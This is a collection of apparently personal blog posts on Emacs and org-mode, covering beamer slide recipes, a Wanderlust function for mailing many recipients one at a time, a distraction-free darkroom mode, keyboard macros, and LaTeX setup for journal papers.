2.4.3 Three    B_block

2.4.4    BMCOL B_ignoreheading

2.4.5 Two    B_block

2.4.6 Four    B_block

2.5 Top-aligned blocks

2.5.1 Code    B_block BMCOL

*** Code                                                      :B_block:BMCOL:
    :PROPERTIES:
    :BEAMER_env: block
    :BEAMER_col: 0.5
    :BEAMER_envargs: C[t]
    :END:

*** Result                                                    :B_block:BMCOL:
    :PROPERTIES:
    :BEAMER_env: block
    :BEAMER_col: 0.5
    :END:
pretty nice!

2.5.2 Result    B_block BMCOL

pretty nice!

2.6 Two columns with text underneath - code

2.6.1    B_columns

  • Code    BMCOL

    \tiny

    ***  :B_columns:
        :PROPERTIES:
        :BEAMER_env: columns
        :END:
    
    **** Code :BMCOL:
        :PROPERTIES:
        :BEAMER_col: 0.6
        :END:
    
    **** Result :BMCOL:
        :PROPERTIES:
        :BEAMER_col: 0.4
        :END:
    
    *** Underneath :B_ignoreheading:
        :PROPERTIES:
        :BEAMER_env: ignoreheading
        :END:
    Much text underneath! Very Much.
    Maybe too much. The whole width!
    

    \normalsize


  • Result    BMCOL

2.6.2 Underneath    B_ignoreheading

Much text underneath! Very Much. Maybe too much. The whole width!

2.7 Nice quotes

2.7.1 Code    B_block BMCOL

#+begin_quote
Emacs org-mode is a 
great presentation tool - 
Fast to beautiful slides.
- Arne Babenhauserheide
#+end_quote

2.7.2 Result    B_block BMCOL

Emacs org-mode is a great presentation tool - Fast to beautiful slides.

  • Arne Babenhauserheide

2.8 Math snippet

2.8.1 Code    BMCOL B_block

2.8.2 Inline    B_block

\( 1 + 2 = 3 \) is clear

2.8.3 As equation    B_block

\[ 1 + 2 \cdot 3 = 7 \]

2.8.4 Result    BMCOL B_block

2.8.5 Inline    B_block

\( 1 + 2 = 3 \) is clear

2.8.6 As equation    B_block

\[ 1 + 2 \cdot 3 = 7 \]

2.9 \( \LaTeX \)

2.9.1 Code    BMCOL B_block

\( \LaTeX \) gives a space 
after math mode.

\LaTeX{} does it, too.

\LaTeX does not.

At the end of a sentence 
both work.
Try \LaTeX. Or try \LaTeX{}.

Only \( \LaTeX \) and \( \LaTeX{} \) 
also work with HTML export.

2.9.2 Result    BMCOL B_block

\( \LaTeX \) gives a space after math mode.

\LaTeX{} does it, too.

\LaTeX does not.

At the end of a sentence both work. Try \LaTeX. Or try \LaTeX{}.

Only \( \LaTeX \) and \( \LaTeX{} \) also work with HTML export.

2.10 Images with caption and label

2.10.1    B_columns

  • Code    B_block BMCOL
    #+caption: GNU Emacs icon
    #+label: fig:emacs-icon
    [[/usr/share/icons/hicolor/128x128/apps/emacs.png]]
    
    This is image (\ref{fig:emacs-icon})
    

  • Result    B_block BMCOL

    file:///usr/share/icons/hicolor/128x128/apps/emacs.png

    GNU Emacs icon

    This is image (emacs-icon)


2.10.2    B_ignoreheading

Autoscaled to the block width!

2.11 Examples

2.11.1 Code    BMCOL B_block

: #+bla: foo
: * Example Header

Gives an example, which does not interfere with regular org-mode parsing.

#+begin_example
content
#+end_example

Gives a simpler multiline example which can interfere.

2.11.2 Result    BMCOL B_block

#+bla: foo
* Example Header

Gives an example, which does not interfere with regular org-mode parsing.

content

Gives a simpler multiline example which can interfere.

3 Basic Configuration

3.1 Header

<Title>

#+startup: beamer
#+LaTeX_CLASS: beamer
#+LaTeX_CLASS_OPTIONS: [bigger]
#+AUTHOR: <empty for none, if missing: inferred>
#+DATE: <empty for none, if missing: today>
#+BEAMER_FRAME_LEVEL: 2
#+TITLE: <causes <Title> to be regular content!>

3.2 .emacs config

Put these lines into your .emacs or in a file your .emacs pulls in - i.e. via (require 'mysettings) if the other file is named mysettings.el and ends in (provide 'mysettings).

(org-babel-do-load-languages ; babel, for executing 
 'org-babel-load-languages   ; code in org-mode.
 '((sh . t)
   (emacs-lisp . t)))

(require 'org-latex) ; latex export 
(add-to-list         ; with highlighting
  'org-export-latex-packages-alist '("" "minted"))
(add-to-list 
  'org-export-latex-packages-alist '("" "color"))
(setq org-export-latex-listings 'minted)

3.3 .emacs variables

You can easily set these via M-x customize-variable.

(custom-set-variables ; in ~/.emacs, only one instance 
 '(org-export-latex-classes (quote ; in the init file!
    (("beamer" "\\documentclass{beamer}" 
        org-beamer-sectioning))))
 '(org-latex-to-pdf-process (quote 
    ((concat "pdflatex -interaction nonstopmode" 
             "-shell-escape -output-directory %o %f") 
     "bibtex $(basename %b)" 
     (concat "pdflatex -interaction nonstopmode" 
             "-shell-escape -output-directory %o %f")
     (concat "pdflatex -interaction nonstopmode" 
             "-shell-escape -output-directory %o %f")))))

(concat "…" "…") is used here to get nice, short lines. Use the concatenated string instead ("pdflatex…%f").

3.4 Required programs

3.4.1 Emacs - (gnu.org/software/emacs)

To get org-mode and edit .org files effortlessly.

emerge emacs

3.4.2 Beamer \( \LaTeX \) - (bitbucket.org/rivanvx/beamer)

To create the presentation.

emerge dev-tex/latex-beamer app-text/texlive

3.4.3 Pygments - (pygments.org)

To color the source code (with minted).

emerge dev-python/pygments

4 Thanks and license

4.1 Thanks

Thanks go to the writers of emacs and org-mode, and for this guide in particular to the authors of the org-beamer tutorial on worg.

Thank you for your great work!

This presentation is licensed under the GPL (v3 or later) with the additional permission to distribute it without the sources and the copy of the GPL if you give a link to those.1

Footnotes:

1 : \tiny As additional permission under GNU GPL version 3 section 7, you may distribute these works without the copy of the GNU GPL normally required by section 4, provided you include a license notice and a URL through which recipients can access the Corresponding Source and the copy of the GNU GPL.\normalsize

AnhangGröße
emacs-org-beamer-recipes-thumnail.png8.92 KB
emacs-org-beamer-recipes-thumnail-org.png20.61 KB
2012-08-08-Mi-recipes-for-beamer-latex-presentation-using-emacs-org-mode.pdf247.11 KB
2012-08-08-Mi-recipes-for-beamer-latex-presentation-using-emacs-org-mode.org12.18 KB

Sending email to many people with Emacs Wanderlust

I recently needed to send an email to many people1.

Putting all of them into the BCC field did not work (mail rejected by provider) and when I split it into 2 emails, many did not see my mail because it was flagged as potential spam (they were not in the To-Field)2.

I did not want to put them all into the To-Field, because that would have spread their email-addresses around, which many would not want3.

So I needed a different solution. Which I found in the extensibility of emacs and wanderlust4. It now carries the name wl-draft-send-to-multiple-receivers-from-buffer.

You simply write the email as usual via wl-draft, then put all email addresses you want write to into a buffer and call M-x wl-draft-send-to-multiple-receivers-from-buffer. It asks you about the buffer with email addresses, then shows you all addresses and asks for confirmation.

Then it sends one email after the other, with a randomized wait of 0-10 seconds between messages to avoid flagging as spam.

If you want to use it, just add the following to your .emacs:

(defun wl-draft-clean-mail-address (address)
  (replace-regexp-in-string "," "" address))
(defun wl-draft-send-to-multiple-receivers (addresses) (loop for address in addresses do (progn (wl-user-agent-insert-header "To" (wl-draft-clean-mail-address address)) (let ((wl-interactive-send nil)) (wl-draft-send)) (sleep-for (random 10)))))
(defun wl-draft-send-to-multiple-receivers-from-buffer (&optional addresses-buffer-name) "Send a mail to multiple recipients - one recipient at a time" (interactive "BBuffer with one address per line") (let ((addresses nil)) (with-current-buffer addresses-buffer-name (setq addresses (split-string (buffer-string) "\n"))) (if (y-or-n-p (concat "Send this mail to " (mapconcat 'identity addresses ", "))) (wl-draft-send-to-multiple-receivers addresses))))

Happy Hacking!


  1. The email was about the birth of my second child, and I wanted to inform all people I care about (of whom I have the email address), which amounted to 220 recipients. 

  2. Naturally this technique could be used for real spamming, but to be frank: People who send spam won’t need it. They will already have much more sophisticated methods. This little trick just reduces the inconvenience brought upon us by the measures which are necessary due to spam. Otherwise I could just send a mail with 1000 receivers in the BCC field - which is how it should be. 

  3. It only needs one careless friend, and your connections to others get tracked in facebook and the likes. For more information on Facebook, see Stallman about Facebook

  4. Sure, there are also template mails and all such, but learning to use these would consume just as much time as extending emacs - and would be much less flexible: Should I need other ways to transform my mails, I’ll be able to just reuse my code. 

Simple Emacs DarkRoom

I just realized that I let myself be distracted by all kinds of not-so-useful stuff instead of finally getting to type the text I already wanted to transcribe from stenografic at the beginning of … last week.

Screenshot!

Let’s take a break for a screenshot of the final version, because that’s what we really want to gain from this article: a distraction-free screenshot as distraction from the text :)

Emacs darkroom, screenshot

As you can see, the distractions are removed — the screenshot is completely full screen and only the text is left. If you switch to the minibuffer (i.e. via M-x), the status bar (modeline) is shown.

Background

To remove the distractions I looked again at WriteRoom and DarkRoom and similar which show just the text I want to write. More exactly: I thought about looking at them again, but at second thought I decided to see if I could not just customize emacs to do the same, backed with all the power you get from several decades of being THE editor for many great hackers.

It took some googling and reading emacs wiki, and then some Lisp-hacking, but finally it’s 4 o’clock in the morning and I’m writing this in my own darkroom mode1, toggled on and off by just hitting F11.

Implementation

I build on hide-mode-line (livejournal post or webonastick) as well as the full-screen info in the emacs wiki.

The whole code just takes 76 lines of code plus 26 lines comments and whitespace:

;;;; Activate distraction free editing with F11

; hide mode line, from http://dse.livejournal.com/66834.html / http://webonastick.com
(autoload 'hide-mode-line "hide-mode-line" nil t)
; word counting
(require 'wc)

(defun count-words-and-characters-buffer ()
  "Display the number of words and characters in the current buffer."
  (interactive)
  (message (concat "The current buffer contains "
           (number-to-string
            (wc-non-interactive (point-min) (point-max)))
           " words and "
           (number-to-string 
            (- (point-max) (point-min)))
           " letters.")))

; fullscreen, taken from http://www.emacswiki.org/emacs/FullScreen#toc26
; should work for X und OSX with emacs 23.x (TODO find minimum version).
; for windows it uses (w32-send-sys-command #xf030) (#xf030 == 61488)
(defvar babcore-fullscreen-p t "Check if fullscreen is on or off")
(setq babcore-stored-frame-width nil)
(setq babcore-stored-frame-height nil)

(defun babcore-non-fullscreen ()
  (interactive)
  (if (fboundp 'w32-send-sys-command)
      ;; WM_SYSCOMMAND restore #xf120
      (w32-send-sys-command 61728)
    (progn (set-frame-parameter nil 'width 
                                (if babcore-stored-frame-width
                                    babcore-stored-frame-width 82))
           (set-frame-parameter nil 'height
                                (if babcore-stored-frame-height 
                                    babcore-stored-frame-height 42))
           (set-frame-parameter nil 'fullscreen nil))))

(defun babcore-fullscreen ()
  (interactive)
  (setq babcore-stored-frame-width (frame-width))
  (setq babcore-stored-frame-height (frame-height))
  (if (fboundp 'w32-send-sys-command)
      ;; WM_SYSCOMMAND maximaze #xf030
      (w32-send-sys-command 61488)
    (set-frame-parameter nil 'fullscreen 'fullboth)))

(defun toggle-fullscreen ()
  (interactive)
  (setq babcore-fullscreen-p (not babcore-fullscreen-p))
  (if babcore-fullscreen-p
      (babcore-non-fullscreen)
    (babcore-fullscreen)))

(global-set-key [f11] 'toggle-fullscreen)

; simple darkroom with fullscreen, fringe, mode-line, menu-bar and scroll-bar hiding.
(defvar darkroom-enabled nil)
; TODO: Find out if menu bar is enabled when entering darkroom. If yes: reenable.
(defvar darkroom-menu-bar-enabled nil)

(defun toggle-darkroom ()
  (interactive)
  (if (not darkroom-enabled)
      (setq darkroom-enabled t)
    (setq darkroom-enabled nil))
  (hide-mode-line)
  (if darkroom-enabled
      (progn
        (toggle-fullscreen)
        ; if the menu bar was enabled, reenable it when disabling darkroom
        (if menu-bar-mode
            (setq darkroom-menu-bar-enabled t)
          (setq darkroom-menu-bar-enabled nil))
        ; save the frame configuration to be able to restore to the exact previous state.
        (if darkroom-menu-bar-enabled
            (menu-bar-mode -1))
        (scroll-bar-mode -1)
        (let ((fringe-width 
               (* (window-width (get-largest-window)) 
                  (/ (- 1 0.61803) (1+ (count-windows)))))
              (char-width-pixels 6))
        ; 8 pixels is the default, 6 is the average char width in pixels
        ; for some fonts:
        ; http://www.gnu.org/software/emacs/manual/html_node/emacs/Fonts.html
           (set-fringe-mode (truncate (* fringe-width char-width-pixels))))
    
        (add-hook 'after-save-hook 'count-words-and-characters-buffer))
    
    (progn 
      (if darkroom-menu-bar-enabled
          (menu-bar-mode))
      (scroll-bar-mode t)
      (set-fringe-mode nil)
      (remove-hook 'after-save-hook 'count-words-and-characters-buffer)
      (toggle-fullscreen))))

; Activate with M-F11 -> enhanced fullscreen :)
(global-set-key [M-f11] 'toggle-darkroom)

(provide 'activate-darkroom)

Also I now activated cua-mode to make it easier to interact with other programs: C-c and C-x now copy/cut when the mark is active. Otherwise they are the usual prefix keys. To force them to be the prefix keys, I can use control-shift-c/-x. I thought this would disturb me, but it does not.

To make it faster, I also told cua-mode to have a maximum delay of 50ms, so I don’t feel the delay. Essentially I just put this in my ~/.emacs:

(cua-mode t)
(setq cua-prefix-override-inhibit-delay 0.005)

Epilog

Well, did this get me to transcribe the text? Not really, since I spent the time building my own DarkRoom/WriteRoom, but I enjoyed the little hacking and it might help me get it done tomorrow - and get far more other stuff done.

And it is really fun to write in DarkRoom mode ;)

PS: If you like the simple darkroom, please leave a comment!

I hereby declare that anyone is allowed to use this post and the screenshot under the same licensing as if it had been written in emacswiki.


  1. Actually there already is a darkroom mode, but it only works for windows. If you use that platform, you might enjoy it anyway. So you might want to call this mode “simple darkroom”, or darkroom x11 :) 

AnhangGröße
2011-01-22-emacs-darkroom.png97.37 KB

Staying sane with Emacs (when facing drudge work)

I have to sift through 6 really boring config files. To stay sane, I call in Emacs for support.

My task looks like this:

img
(click for full size)

In the lower left window I check the identifier in the table I have to complete (left column), then I search for all instances of that identifier in the right window and insert the instrument type, the SIGMA (uncertainty due to representation error defined for the type of the instrument and the location of the site) and note whether the site is marked as assimilated in the config file.

Then I also check all the other config files and note whether the site is assimilated there.

Drudge work. There are people who can do this kind of work. My wife would likely be able to do it faster without tool support than I can do it with tool support. But I’m really bad at that: When the task gets too boring I tend to get distracted - for example by writing this article.

To get the task done anyway, I create tools which make it more enjoyable. And with Emacs that’s actually quite easy, because Emacs provides most required tools out of the box.

Firstoff: My workflow before adding tools was like this:

  • hit xo to switch from the lower left window to the config file at the right.
  • Use M-x occur then type the station identifier. This displays all occurances of the station identifier within the config file in the upper left window.
  • Hit xo twice to switch to the lower left window again.
  • Type the information into the file.
  • Switch to the next line and repeat the process.

I now want to simplify this to a single command per line. I’ll use F9 as key, because that isn’t yet used for other things in my Emacs setup and because it is easy to reach and my default keybinding as “useful shortcut for this file”. Other single-keystroke options would be F7 and F8. All other F-keys are already used :)

To make this easy, I define a macro:

  • Move to the line above the line I want to edit.
  • Start Macro-recording with C-x C-(.
  • Go to the beginning of the next line with C-n and C-a.
  • Activate the mark with C-SPACE and select the whole identifier with M-f.
  • Make the identifier lowercase with M-x downcase-region, copy it with M-w and undo the downcasing with C-x u (or use the undo key; I defined one in my xmodmap).
  • Switch to the config file with C-x o
  • Search the buffer with M-x occur, inserting the identifier with C-y.
  • Hit C-x o C-x o (yes, twice) to get back into the list of sites.
  • Move to the end of the instrument column with M-f and kill the word with C-BACKSPACE.
  • Save the macro with C-x C-).
  • Bind kmacro-call-macro to F9 with M-x local-set-key F9 kmacro-call-macro.

Done.

My workflow is now reduced to this:

  • Hit F9
  • Type the information.
  • Repeat.

I’m pretty sure that this will save me more time today than I spent writing this text ☺

Happy hacking!

AnhangGröße
2015-01-26-sane-with-emacs-task.png79.85 KB
2015-01-26-sane-with-emacs-task-200.png7.79 KB
2015-01-26-sane-with-emacs-task-300.png15.92 KB
2015-01-26-sane-with-emacs-task-400.png27.28 KB
2015-01-26-sane-with-emacs-task-450.png33.83 KB

Tutorial: Writing scientific papers for ACP using emacs org-mode

Update 2023: I no longer work at the University. Nowadays I would use this setup as starting point, but with more focus on using org for reproducibility (I have German instructions for that) when the first version is ready for submission, export it as LaTeX, and work directly on that, because you’ll need detailed changes in LaTeX.

PDF-version (for printing)

orgmode-version (for editing)

Emacs Org mode is an excellent tool for reproducible research,1 but research is only relevant if people learn about it.2 To reach people with scientific work, you need to publish your results in a Journal, so I show here how to publish in ACP with Emacs Org mode.3

1 Requirements

To use this tutorial, you need

  • a fairly recent version of org-mode (8.0 or later - not yet shipped with emacs 24.3, so you will need to install it separately) and naturally
  • Emacs. Also you need to download the
  • copernicus latex package. And it can’t hurt to have a look at the latex-instructions from ACP. I used them to create my setup.
  • lineno.sty. This is required by copernicus, but not included in the package - and neither in the texlive version I use.

2 Basic Setup

2.1 Emacs

The first step in publishing to ACPD is to activate org-mode and latex export and to create a latex-class in Emacs. To do so, just add the following to your ~/.emacs (or ~/.emacs.d/init.el) and eval it (for example by moving to the closing parenthesis and typing C-x C-e):

  (require 'org)
  (require 'org-latex)
  (require 'ox-latex)
  (setq org-latex-packages-alist 
        (quote (("" "color" t) ("" "minted" t) ("" "parskip" t)))
        org-latex-pdf-process 
        (quote (
"pdflatex -interaction nonstopmode -shell-escape -output-directory %o %f" 
"bibtex $(basename %b)" 
"pdflatex -interaction nonstopmode -shell-escape -output-directory %o %f" 
"pdflatex -interaction nonstopmode -shell-escape -output-directory %o %f")))
  (add-to-list 'org-latex-classes
               `("copernicus_discussions"
                 "\\documentclass{copernicus_discussions}
               [NO-DEFAULT-PACKAGES]
               [PACKAGES]
               [EXTRA]"
                 ("\\section{%s}" . "\\section*{%s}")
                 ("\\subsection{%s}" "\\newpage" "\\subsection*{%s}" "\\newpage")
                 ("\\subsubsection{%s}" . "\\subsubsection*{%s}")
                 ("\\paragraph{%s}" . "\\paragraph*{%s}")
                 ("\\subparagraph{%s}" . "\\subparagraph*{%s}"))
               )

This allows you to use #+Latex_Class: copernicus_discussions in your org-mode file to set the PDF to export for ACPD.

Also you will likely want to use reftex for nice bibtex integration. To get it, add the following to your ~/.emacs or ~/.emacs.d/init.el:

(require 'reftex-cite)
(defun org-mode-reftex-setup ()
  (interactive)
  (and (buffer-file-name) (file-exists-p (buffer-file-name))
       (progn
        ; Reftex should use the org file as master file. See C-h v TeX-master for infos.
        (setq TeX-master t)
        (turn-on-reftex)
        ; enable auto-revert-mode to update reftex when bibtex file changes on disk
        (global-auto-revert-mode t) ; careful: this can kill the undo
                                    ; history when you change the file
                                    ; on-disk.
        (reftex-parse-all)
        ; add a custom reftex cite format to insert links
        ; This also changes any call to org-citation!
        (reftex-set-cite-format
         '((?c . "\\citet{%l}") ; natbib inline text
           (?i . "\\citep{%l}") ; natbib with parens
           ))))
  (define-key org-mode-map (kbd "C-c )") 'reftex-citation)
  (define-key org-mode-map (kbd "C-c (") 'org-mode-reftex-search))

(add-hook 'org-mode-hook 'org-mode-reftex-setup)

The first line adds reftex-citations with C-c [, the rest sets some reftex-defaults and adds a menu which allows you to chose using \textbackslash citep{} instead of \textbackslash cite{} (this is what ACPD requires).

For nice Sourcecode highlighting, you should also install Pygmentize and then add the following to your .emacs.d:

(add-to-list 'org-latex-packages-alist '("" "minted"))
(add-to-list 'org-latex-packages-alist '("" "color"))
(setq org-latex-listings 'minted)

; add emacs lisp support for minted
(setq org-latex-custom-lang-environments
      '((emacs-lisp "common-lispcode")))

2.2 The working folder

As next step, unzip the copernicus latex package in the folder you want to use for writing your article (do use a dedicated folder for that: org-mode leaves around some files). And remember to use a version-tracking system like Mercurial, so you can always take snapshots of your current state.

This will give you the following files:

  • authblk.sty
  • copernicus.bst
  • copernicus_discussions.cls
  • natbib.sty
  • pdfscreen.sty
  • pdfscreencop.sty

Ensure that all of them are in your folder, not in a subfolder. If necessary copy them there.

Also get lineno.sty and copy it into your folder.

If you want to use unicode-symbols in your text, add uniinput.sty, too.

3 The org-mode document

Using the ACPD style requires some deviations from the standard org-mode export process. Luckily org-mode is flexible to adapt to them. Setup your document as follows:

#+title: YOUR TITLE
#+Options: toc:nil ^:nil
#+BIND: org-latex-title-command ""
#+Latex_Class: copernicus_discussions
#+LaTeX_CLASS_OPTIONS: [acpd, hvmath, online]

# Nice code-blocks
#+BEGIN_SRC elisp :noweb no-export :exports results
  (setq org-latex-minted-options
    '(("bgcolor" "mintedbg") ("frame" "single") ("framesep" "6pt") 
      ("mathescape" "true") ("fontsize" "\\footnotesize")))
  nil
#+END_SRC

#+BEGIN_ABSTRACT
Abstract
#+END_ABSTRACT
#+TOC: headlines 2

#+Latex: \runningtitle{SHORT TITLE}
#+Latex: \runningauthor{SHORT AUTHOR}
#+Latex: \correspondence{AUTHOR NAME\\ EMAIL}
#+Latex: \affil{YOUR UNIVERSITY}
#+Latex: \author[2,*]{SECOND AUTHOR}
#+Latex: \author[1]{THIRD AUTHOR SAME INSTITUTE}
#+Latex: \affil[2]{SECOND UNIVERSITY}
#+Latex: \affil[*]{now at: THIRD UNIVERSITY}

#+Latex: \received{}
#+Latex: \pubdiscuss{}
#+Latex: \revised{}
#+Latex: \accepted{}
#+Latex: \published{}
#+Latex: %% These dates will be inserted by ACPD
#+Latex: \firstpage{1}

#+Latex: \maketitle

#+Latex: \introduction
# * Introduction

* Second section

* Discussion

#+Latex: \conclusions
# * Conclusions

#+Latex: \appendix

# use acknowledgements for multiple
#+BEGIN_acknowledgement
Foo Bar Baz.
#+END_acknowledgement

#+Latex: \bibliographystyle{copernicus}
#+Latex: \bibliography{ABSOLUTE_PATH_TO_YOUR_BIBTEX_FILE_WITHOUT_.bib_SUFFIX}{}

# Local Variables:
# org-confirm-babel-evaluate: nil
# org-export-allow-bind-keywords: t
# End:

Let’s look at this in more detail.

3.1 Use the LaTeX class

As first step, we set the LaTeX class. In the options we select the journal (acpd) and such - you can find the detailed options in the latex-instructions from ACP.

#+Latex_Class: copernicus_discussions
#+LaTeX_CLASS_OPTIONS: [acpd, hvmath, online]

3.2 Delayed table of contents

The table of contents is set to be shown after the Abstract by setting the toc:nil option and later explicitely calling #+TOC: headlines 2. In org-mode this is really straightforward.

3.3 Delayed maketitle

Delaying \textbackslash maketitle is a bit more convoluted than delaying the TOC. First we add the local variable org-export-allow-bind-keywords: t at the bottom to allow file-local custom bindings for functions in the file, then we inactivate the title-command with #+BIND: org-latex-title-command /""/ and finally we add \textbackslash maketitle where we need it.

3.4 Define minted style

This defines the variables minted uses for beautiful code-blocks. Without this, your code-blocks will just look like inline text.

#+BEGIN_SRC elisp :noweb no-export :exports results
  (setq org-latex-minted-options
    '(("bgcolor" "mintedbg") ("frame" "single") ("framesep" "6pt") 
      ("mathescape" "true") ("fontsize" "\\footnotesize")))
  nil
#+END_SRC

3.5 Intro and conclusions

The Introduction and the conclusions have their own commands in ACPD, because they use them to add bookmarks. You can also use he commands to specify another name.

We call the commands with #+LaTeX: (just like some others) which allows us to explicitely add arbitrary LaTeX-code.

3.6 Appendix

The appendix should be used sparingly. It changes the numbering of the pages.

#+Latex: \appendix

3.7 Bibliography

The bibliography allows referring to entries from your general bibtex-file. Ensure that you use the correct absolute path to that file. For more information, see the org-tutorial page for biblatex.

3.8 Babel evaluate without confirmation

This allows us to just run all code snippets which we embedded in the document when we export the file. If we do not set this local variable, we have to acknowledge each source block before it runs (the block with local variables also contains the variable which allows binding functions on a per-file basis, as explained above).

# Local Variables:
# org-confirm-babel-evaluate: nil
# org-export-allow-bind-keywords: t
# End:

4 Conclusion

With this setup, you can publish your paper with ACPD using org-mode for the actual writing, which has a much lower overhead than LaTeX and offers quite a few unique features for more efficient working - from easy referencing over inline math preview to planning and code-evaluation directly in your file.

Footnotes:

1

General methods for using Emacs org-mode in scientific publishing have been described by \citet{SchulteEmacs2012}.

2

Research, or rather science not only means to learn new things and to uncover secrets, but just as importantly to share what you learn. Fun fact: The German word for science is “Wissenschaft”, built from the words “wissen” (knowledge) and “schaft” (from schaffen: create), so it more exactly captures the essence of scientific work than the word “science”, that is based on the latin word “scientia” which just means knowledge. It isn’t enough to just learn. Creating knowledge requires telling it to others, so they can build upon it.

3

I chose ACPD as target for this article, because it is an Open Access journal, and because I want to publish in it (which makes it a rather natural choice for a tutorial).

Unicode char \u8:χ not set up for use with LaTeX: Solution (made easy with Emacs)

For years I regularly stumbled over LaTeX-Errors in the form of Unicode char \u8:χ not set up for use with LaTeX. I always took the chickens path and replaced the unicode characters with the tex-escapes in the file. That was easy, but it made my files needlessly unreadable. Today I decided to FIX the problem once and for all. And it worked. Easily.

Firstoff: The problem I’m facing is that my keyboard layout makes it effortless for me to input characters like ℂ Σ and χ. But LaTeX cannot cope with them out-of-the-box. Org-mode already catches most of these problems, so I can write things like x² instead of x^2, but occasionally it stumbles.

The solution to that is actually pretty simple: I only need to declare the escapes-sequences LaTeX should use when it sees one of the characters (to be used before \begin{document}!):

\DeclareUnicodeCharacter{03C7}{\chi}

Or in org-mode:

#+LaTeX_HEADER: \DeclareUnicodeCharacter{03C7}{\chi}

To do this more easily, you can use the uniinput.ins and uniinput.dtx from the neo-layout project. Run latex uniinput.ins to generate uniinput.sty which you can put next to your latex files and use with \usepackage{uniinput} (instructions in German).

Thanks go to Wikibooks:LaTeX for this. Their solution suggests then to read several Unicode definition documents for tracking down the codepoint of the character. But we can make that easier with Emacs (almost everything is easier with Emacs ☺).

Instead of browsing huge documents manually, we simply rely on the unicode-definitions in Emacs: Move the cursor over the char and execute M-x describe-char.

When used with χ, this shows the following output:

             position: 672 of 35513 (2%), column: 0
            character: χ (displayed as χ) (codepoint 967, #o1707, #x3c7)
    preferred charset: unicode-bmp (Unicode Basic Multilingual Plane (U+0000..U+FFFF))
code point in charset: 0x03C7
… (and a bit more) …

What we need is code point in charset: Just leave out the 0x and you have the codepoint.

For the document I currently write, I now use the following definitions:

#+LaTeX_HEADER: \DeclareUnicodeCharacter{03C7}{\chi}
#+LaTeX_HEADER: \DeclareUnicodeCharacter{B2}{^{2}}

And that makes χ² work.

Happy Hacking - and have fun with Emacs Org-Mode!

Unicode-Characters for TODO-States in Emacs Orgmode

By default Emacs Orgmode uses uppercase words for todo keywords. But having tens of entries marked with TODO and DONE in my file looked horribly cluttered to me. So I searched for alternatives. After a few months of experimentation, I decided on the following scheme. It served me well ever since:

  • ❢ To do
  • ☯ In progress
    • ⚙ A program is running (optional detail)
    • ✍ I’m writing (optional detail)
  • ⧖ Waiting
  • ☺ To report
  • ✔ Done
  • ⌚ Maybe do this at some later time
  • ✘ Won’t do

To set this in org-mode, just add the following to the header (and reopen the document, for example with C-x C-v):

#+SEQ_TODO: ❢ ☯ ⧖ | ☺ ✔ ⌚ ✘

or for the complex case (with details on what I do)

#+SEQ_TODO: ❢ ☯ ⚙ ✍ ⧖ | ☺ ✔ ⌚ ✘

Then use C-c C-t or SHIFT-→ (shift + right arrow) to switch to the next state or SHIFT-← (shift + left arrow) to switch to the previous state.

Anything before the | in the SEQ_TODO is shown in red (not yet done), anything after the | is show in green (done). Things which get triggered when something is done (like storing the time of a scheduled entry) happen when the state crosses the |.

And with that, my orgmode documents are not only very useful but also look pretty lean. Just as good as having a GUI with images, but additionally I can access them over SSH and edit the todo state with any tool - because it’s just text.

Use the source, Luke! — Emacs org-mode beamer export with images in figure

I just needed to tweak my Emacs org-mode to beamer-latex export to embed images into a figure environment (not wrapfigure!). After lots of googling and documentation reading I decided to bite the bullet and just read the source. Which proved to be much easier than I had expected.

This tutorial requires at least org-mode 8.0 (before that you had to use hacks to get figure without a caption). It is only tested for org-mode 8.0.2: The code you see when you read the source might look different in other versions.

1 Task

I just needed to tweak my org-mode to beamer-latex export to embed images I produce by a codesnippet in a figure environment. Practially speaking: I had this

#+BEGIN_SRC sh :exports results :results output raw
echo '[[./image.png]]'
#+END_SRC

which produces this latex snippet

\includegraphics[width=.9\linewidth]{./image.png}

and I needed a snippet which instead produces this:

\begin{figure}[htb]
\centering
\includegraphics[width=.9\linewidth]{./image.png}
\end{figure}

2 Use the Source!

After lots of googling and documentation reading I decided to bite the bullet and just read the source. Which proved to be much easier than I had expected (warning: obscure list of commands follows. Will be explained afterwards):

C-h f org-latex-export-as-latex
C-x C-o
C-s .el C-b ENTER
C-s figure C-s C-s C-s ...

And less than a minute after starting, I saw this:

(float (let ((float (plist-get attr :float)))
     (cond ((string= float "wrap") 'wrap)
       ((string= float "multicolumn") 'multicolumn)
       ((or (string= float "figure")
            (org-element-property :caption parent))
        'figure))))

Translated: Just add this to the output of the source block:

#+attr_latex: :float figure

which makes the sh block look like this:

#+BEGIN_SRC sh :exports results :results output raw
echo '#+attr_latex: :float figure'
echo '[[./image.png]]'
#+END_SRC

And voila, the export works and the latex looks like this:

\begin{figure}[htb]
\centering
\includegraphics[width=.9\linewidth]{./image.png}
\end{figure}

Mission accomplished!

3 Commands Explained

For all those who are not fluid in emacs commands, Here’s a short breakdown here’s a breakdown of my source-reading process:

C-h f org-latex-export-as-latex

Get the help (Control-h) for the function (f) org-latex-export-as-latex. I knew that org-mode calls that. If you did not know it, you could have simply used C-h k C-e (get help on the export keyboard shortcut) which would have led you to the function org-export-dispatch and the source file ox.el. But since the org-mode guides tell you to use M-x org-latex-export-as-latex, the function to search for is actually pretty obvious. Alternatively just use M-x org-latex- and then type TAB 2 times. That will show you all the export functions.

C-x C-o

Switch to the other buffer.

C-s .el C-b ENTER

Focus on the source file and open it (the canonical suffix for emacs lisp files is .el).

C-s figure C-s C-s C-s ...

Search for figure. Repeat 9 times to find the correct place in the code (in emacs that’s really easy and fast to do).

Voilà, you found the snippet which tells you that you can use the float-keyword (:float) with the argument "figure".

4 Conclusion

Using the source was actually faster than googling in this case - and if you practise it, you learn bits and pieces about the foundation of the program you use, which will enable you to adapt it even better to your needs in the future.

And with that, I conclude this text.

Enjoy your Emacs and Happy Hacking!

AnhangGröße
2013-08-28-Mi-use-the-source-beamer-figure.org3.8 KB

Using Macros to avoid tedious tasks (screencast)

Because I am lazy,1 and that makes me fast.

Screencast

(download (ogg theora video))

Using Macros to avoid tedious tasks

Plan

  • [X] Show the task
  • [X] Record Macro
  • [X] Use Macro

Explanation

I record a macro to find ~, then activate the mark and find a space.

C-s ~, C-SPACE, C-s SPACE

Then kill the region and type ${}

C-w ${}

That’s it.

Why??

  • It is resilient: I check each change I do.
  • I avoid repeating unnerving stuff.

Thank you

recorded with recordmydesktop: recordmydesktop --delay 10 --width 800 --height 600 --on-the-fly-encoding


  1. I have lots of stuff to do, so I cannot afford not being lazy ☺ 

AnhangGröße
using-emacs-macros-to-reduce-tedious-work-screencast.ogv17.81 MB
